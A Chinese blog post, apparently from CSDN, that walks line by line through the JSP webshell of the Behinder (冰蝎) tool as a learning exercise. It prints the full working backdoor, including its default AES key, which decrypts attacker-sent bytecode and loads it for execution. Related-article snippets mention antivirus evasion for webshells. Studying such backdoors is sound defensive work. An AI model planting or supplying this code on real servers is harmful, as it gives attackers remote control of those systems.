[JAVA安全webshell]冰蝎jsp木马分析

最新推荐文章于 2024-01-16 11:55:15 发布
最新推荐文章于 2024-01-16 11:55:15 发布
阅读量1w 收藏 8
点赞数 4
分类专栏: JAVA安全 文章标签: java 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GX233/article/details/124556802
版权

前言

只是分享一下对冰蝎webshell分析的一个学习过程,冰蝎webshell使用了加载字节码的方式执行恶意代码。

正文

首先打开webshell1
这么一行实在不好看,先把他分行吧。

分完行之后,就很清晰明了了。
在这里插入图片描述

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{
    U(ClassLoader c){
        super(c);
    }

    public Class g(byte []b){
        return super.defineClass(b,0,b.length);
    }
}%>
<%if (request.getMethod().equals("POST"))
{
    String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
    session.putValue("u",k);
    Cipher c=Cipher.getInstance("AES");
    c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
    new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
}%>

导入了三个依赖,一个是标准库,两个估计用于加密。

然后定义了一个类U,继承自ClassLoader,盲猜是用加载字节码的方式来执行命令,后面实现了g公有函数,函数里调用了defineClass(这可是加载恶意类的关键)

接下来就是主函数的部分。首先判断请求方式是否为POST(它希望是)。定义了一个字符串k,是连接的密钥,注释中有详细说明。

接下来用putValue往session中存入一个键为u,值为密钥的键值对。也就是把密钥存入session的意思(putValue应该和setAttribute功能差不多,百度了一下,发现putValue从servlet版本上被setAttribute代替了)。

接着实例化了一个Cipher类。

javax.crypto.Cipher类是从jdk1.4就开始引入,所属jdk拓展包Java Cryptographic Extension(JCE)框架,该框架主要用于加密解密和密码功能

从它传入的参数得知,c是一个用于AES加密的工具。

在这里插入图片描述

(刚开始想跟进去分析Cipher类的代码,但一想,实在没必要,这属于此类的应用场景,那只需要去百度怎么用就好了。。。。给自己无语住了)

接下来执行算法的初始化,c.init(),使用密钥和一组算法参数初始化此密码算法。看一下官方文档,这些api。

在这里插入图片描述

opmode是常量。

在这里插入图片描述

看回源码这一行。

c.init(2,new SecretKeySpec(k.getBytes(),"AES"));

很明显,第一个参数,指定了密码的模式,第二个参数就是一个KEY类的实例,KEY类也很单纯,抛去各种方法,函数,也就是两个变量,一个是密钥,一个是算法名。

在这里插入图片描述

模式2是什么,虽然能猜到受控端肯定是解密模式,但是还是在里面看了一下。模式为decryption,解密。

在这里插入图片描述

最后一行才是主要部分。

new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);

嵌套了不少层,从里往外看。首先读取了post包的body部分的首行。

request.getReader().readLine()

然后,使用BASE64解码该行。

new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine())

然后调用上面所说的密码工具对其进行AES解密(解密模式在init初始化时由2决定)。

c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))

实例化了一个U类,在构造函数中取得了一个ClassLoader作为父类,来给U调用父类的构造方法。

new U(this.getClass().getClassLoader())

在这里插入图片描述

然后调用它的g方法来执行defineClass,也就是加载字节码,参数是上面解密后的内容。然后newInstance实例化(define不会执行任何初始化代码,包括static和constructor)

new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance()

到这里就结束了。发送过去的payload形式应当是恶意类的字节码,并且经过AES加密之后再base64编码。

最后

大佬们,请多多留言指正和指导,谢谢大佬们啦。

Cgxx
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
蚁剑jsp一句话木马
jennycisp的博客
12-25 2857
密码为 passwd。
java安全——jsp一句话木马
m0_46317063的博客
01-31 1万+
java一句话木马
java webshell jsp 木马攻防 简介
whatday的专栏
08-04 1万+
目录 基础知识 JSP标签 JSP中的字符串混淆方式 类反射 类加载 对命令执行JSP一句话免杀 原型 类反射绕过 寻找其他类 对于冰蝎JSP一句话的免杀 免杀D盾 免杀百度scanner 总结 防范方法 其他类型的webshell容易免杀的一个主要原因是有eval函数,能够把我们的加密几层后的payload进行解密然后用eval执行,从而绕过杀软的检测。 然而由于JSP的语法没有所谓的eval函数,不像php等语言那么灵活,变形困难,所以JSP的免杀马比较少,相关的文章也比
tomcat put方法任意写文件漏洞
weixin_48739941的博客
04-21 2853
(1)cd vulhub/tomcat/CVE-2017-12615 切换目录。 (2) docker-compose up -d 启动。 (3)访问:http://192.168.43.137:8080/ (4)burpsuite抓包。 (5)send to repeater,修改为PUT /l3yx.txt。 (6) docker exec -it 3e7 bash ; cd webapps/ ;cd ROOT ;cat l3yx.txt进入容器,查看。 ...
冰蝎4.0jsp木马浅析
Dokii_i的博客
01-16 2379
这里简单学习一下冰蝎是怎么运行的,如何通过加密解密来绕过一些常见的waf设备在看完了冰蝎是怎么连接之后,对于冰蝎的工作原理也有了一定的理解,本地和服务器端都做加密和解密的操作,以此来绕过流量检测设备以及一些waf,而且通过动态的加载class字节码,也可以绕过一些普通的webshell查杀设备,后续的一些绕过,可以在加密方式以及特征值的修改上入手。
tomcat 文件上传 (CVE-2017-12615)漏洞复现
weixin_42675091的博客
09-01 384
tomcat 文件上传 (CVE-2017-12615)漏洞复现
强大的webshell管理工具——冰蝎
12-26
1. **全面的WebShell支持**:冰蝎能够管理和控制多种类型的WebShell,包括PHP、ASP、JSP、Python等常见服务器脚本语言的后门,这使得它在跨平台的Web安全分析中具有很高的适用性。 2. **功能丰富的操作界面**:它...
冰蝎webshell,
08-18
在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 主要的事情说三遍
冰蝎V4.1Behinder
最新发布
03-11
冰蝎V4.1 Behinder】是一款知名的Webshell工具,主要用于网络安全测试和渗透测试领域。Webshell,也称为Web后门,是一种通过Web应用程序漏洞植入的恶意代码,允许远程控制服务器。冰蝎(Behinder)是这类工具的...
冰蝎,从入门到魔改(续)1
08-03
冰蝎Webshell的魔改涉及多个层面,包括但不限于密钥交换、HTTP头信息、请求模式以及Java代码的逻辑调整。为了提高免杀能力,攻击者需要不断适应和改变这些特征,以避开安全检测系统的监控。同时,随着防御技术的升级...
Webshell安全分析实践谈
01-28
Webshell安全的一本好的实践文档,希望对大家有所帮助!
[Java随笔]冰蝎2.0-jsp马交互部分源码解读及其特征检测
Y4tacker的博客
11-11 3286
文章目录写在前面源码解读Jsp马交互部分源码解读认证流程 写在前面 大概是最近搞内存马有点累了,今晚顺便看看冰蝎部分源码,简简单单写篇博客休息休息,本着怕第一次看这个工具源码,怕直接看最新的容易不理解,就拿了个2.0版本看着玩吧,谁知道也太简单了:同款源码在rebeyond/Behinder 源码解读 反编译jar包后,其核心代码在net.rebeyond.behinder Jsp马交互部分源码解读 直接丢出来源码,挺简单的,首先是一个继承ClassLoader的U类,一看defineClass就知道是加载
Tomcat 任意文件写入漏洞 CVE-2017-12615
qq_42352268的博客
07-15 843
复现 CVE-2017-12615
冰蝎 连接木马到反弹shell拿到权限全过程
热门推荐
hackzkaq的博客
11-25 1万+
一.冰蝎简介 什么是冰蝎冰蝎”是一个动态二进制加密网站管理客户端。 在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。 基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。 一.冰蝎连接getshell方法 1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16] <?php @errorreporting(0); session_start()
冰歇webshell初探
qq_69775412的博客
04-22 5514
木马样本: <?php class C{ public function __invoke($p) { eval($p.""); } }; session_start(); isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSIO
java 简单的webshell_一个简单的webshell
weixin_35430535的博客
02-26 683
Thanks for your support "};String[] strFileManage={"文 件 管 理","File Management"};String[] strCommand={"CMD 命 令","Command Window"};String[] strSysProperty={"系 统 属 性","System Property"};String[] strHelp...
过d盾 jsp webshell+冰蝎免杀马探讨
goddemon
07-19 2413
jsp免杀马的思路其实一般最常用的就是反射和类加载问题+反转问题就能bypasswebshell的查杀了当然现在的有些厂商直接强标识这种就要el去绕咯。
如何识别冰蝎webshell文件
07-14
识别冰蝎冰蝎RAT)Webshell 文件可以是一项复杂的任务,因为这种 Webshell 文件通常会采用各种隐蔽和加密技术来逃避检测。以下是一些常见的方法和指南,可用于帮助识别冰蝎 Webshell 文件: 1. 文件名和路径:冰蝎 Webshell 文件通常会使用伪装性强的文件名和路径,以掩盖其真实用途。一些常见的文件名可能包括类似于 "index.php.bak" 或 "config.php.bak" 的后缀。 2. 文件内容:冰蝎 Webshell 文件的内容通常会包含加密、编码或混淆的代码。这些代码可能会使用变量替换、字符串拼接等技术来隐藏其真实功能。您可以检查文件内容中是否存在可疑的、与正常网页文件不符合的代码段。 3. HTTP 请求特征:冰蝎 Webshell 文件通常通过 HTTP 协议与远程控制服务器通信。您可以检查文件中是否存在与远程控制服务器通信相关的特征,如特定的 URL、POST 或 GET 请求等。 4. 常见指纹:冰蝎 Webshell 是一种常见的 Webshell 类型,有许多安全工具和脚本可以帮助您识别这种类型的 Webshell。例如,一些Webshell扫描器可以通过检查文件的特定特征或指纹来识别冰蝎 Webshell 文件。 5. 安全工具:使用安全工具进行扫描和检测,如安全防护软件、Web应用程序防火墙(WAF)等。这些工具可以帮助您自动检测和识别冰蝎 Webshell 文件。 除了上述方法,还有许多其他技术和工具可用于识别冰蝎 Webshell 文件。然而,鉴于冰蝎 Webshell 的变种和不断演变,没有一种方法可以完全保证识别所有的冰蝎 Webshell。因此,如果您怀疑系统中存在冰蝎 Webshell 文件,最好寻求专业的安全专家或安全团队的帮助来进行详细的分析和处理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cgxx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值